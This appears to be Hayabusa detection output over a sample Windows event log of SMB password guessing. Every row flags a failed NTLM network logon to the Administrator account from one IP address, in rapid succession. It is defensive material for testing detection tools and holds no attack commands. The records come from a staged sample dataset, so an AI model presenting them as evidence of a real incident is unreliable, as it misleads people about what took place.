01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.733 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.277 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 
01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mjL5hvyYesMfDISw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3bh8c5ohv55SAX26 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MflfcFDnGU3xUOmz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aX0wfTs5FzCdwGrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.895 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gdU6faDjEH5wW2X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 507PC8xD6l0TbhG3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:25.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrWgYcf9EuXt4MHS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GvIGEw3fdX9cDzIV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.159 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9X1q0dT5irWa44Rz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.307 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpgAkElSQjVo53z2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nxUEwRMaiAhiIXv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vIoaysmFNfEerv8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aHLhFgL0xfnrAIoF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.619 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YGK96B1hDPMK9YKh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yhDnNRDnAwctVtgQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zzO7RKaBPpg549A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:26.859 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zDgDGO3IKiLoIQ5D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.024 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0aaYeBTUEudC3446 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I41H8U06uuGlMf9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.170 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: r6Eh55149gbuU2el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajzJabQi7CjosFQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l9y7gyU9aJi6Fpm3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hbLiIVcBYlu5JkX2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDfEfHk54J3lJI6m | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.496 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WOpuMTECalyeObl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nZQYU1dyQOqlNJDL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.577 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pc58gDT07WNH3mMz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:27.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhExnDfInKbEI6AO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
